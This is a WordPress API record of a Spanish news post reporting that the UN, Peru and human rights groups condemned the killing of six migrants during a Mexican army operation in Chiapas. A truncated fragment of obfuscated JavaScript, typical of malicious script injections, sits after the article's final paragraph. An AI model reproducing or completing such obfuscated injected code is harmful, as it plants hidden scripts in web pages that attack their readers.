{"id":18208,"date":"2024-10-05T03:27:02","date_gmt":"2024-10-05T03:27:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18208"},"modified":"2024-10-05T03:27:03","modified_gmt":"2024-10-05T03:27:03","slug":"onu-condena-ataque-armado-contra-migrantes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18208","title":{"rendered":"ONU condena ataque armado contra migrantes"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"131\" height=\"188\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728098755787.jpg\" alt=\"\" class=\"wp-image-18209\"\/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>4 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; La ONU, y organismos de Derechos Humanos y gobiernos de otros pa\u00edses, condenaron los hechos ocurridos en Villa Comaltitl\u00e1n, donde en un operativo militar fallecieron seis migrantes por el ataque de las fuerzas castrenses en un presunto enfrentamiento.<\/p>\n\n\n\n<p>A trav\u00e9s del Alto Comisionado de las Naciones Unidas para los Refugiados y la Organizaci\u00f3n Internacional para las Migraciones, la ONU, expres\u00f3 su preocupaci\u00f3n por los hechos que de acuerdo a la Secretaria de Defensa Nacional (SEDENA) fue en respuesta a una agresi\u00f3n tras la persecuci\u00f3n a una pick up que evadi\u00f3 al personal militar.<\/p>\n\n\n\n<p>La Embajada en M\u00e9xico, por autoridades de la Canciller\u00eda, inform\u00f3 al gobierno de Per\u00fa que entre las v\u00edctimas mortales se encontr\u00f3 un ciudadano peruano.<\/p>\n\n\n\n<p>El Gobierno de Per\u00fa conden\u00f3 los hechos acontecidos, que incluy\u00f3 \u201cla irreparable p\u00e9rdida de la vida de un connacional\u201d. Y exigi\u00f3 a las autoridades una urgente investigaci\u00f3n que esclarezca y determine las responsabilidades del acto.<\/p>\n\n\n\n<p>El Colectivo de Monitoreo Frontera Sur, llam\u00f3 a la una investigacio\u0301n pronta, exhaustiva e imparcial sobre las causas y garantizar los derechos de las 17 personas que fueron puestas a disposicio\u0301n del Instituto Nacional de Migraci\u00f3n (INM).<\/p>\n\n\n\n<p>La SEDENA determin\u00f3 que los 2 militares que dispararon, fueron separados de sus funciones y al ser un hecho donde se vieron afectados civiles, se hizo del conocimiento de la Fiscal\u00eda General de la Rep\u00fablica.<\/p>\n\n\n\n<p>Por su parte la presidenta Claudia Sheinbaum, conden\u00f3 el ataque armado de militares contra migrantes y extern\u00f3 que ser\u00e1 la Fiscal\u00eda la que realizar\u00e1 la investigaci\u00f3n. Y que se tomar\u00e1n las medidas para que hechos similares no vuelvan a ocurrir.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 4 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; La ONU, y organismos de Derechos Humanos y gobiernos de otros pa\u00edses, condenaron los hechos ocurridos en Villa Comaltitl\u00e1n, donde en un operativo militar fallecieron seis migrantes por el ataque de las fuerzas castrenses en un presunto enfrentamiento. A trav\u00e9s del Alto Comisionado de las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18209,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-18208","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18208","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18208"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18208\/revisions"}],"predecessor-version":[{"id":18210,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18208\/revisions\/18210"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18209"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18208"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18208"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18208"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}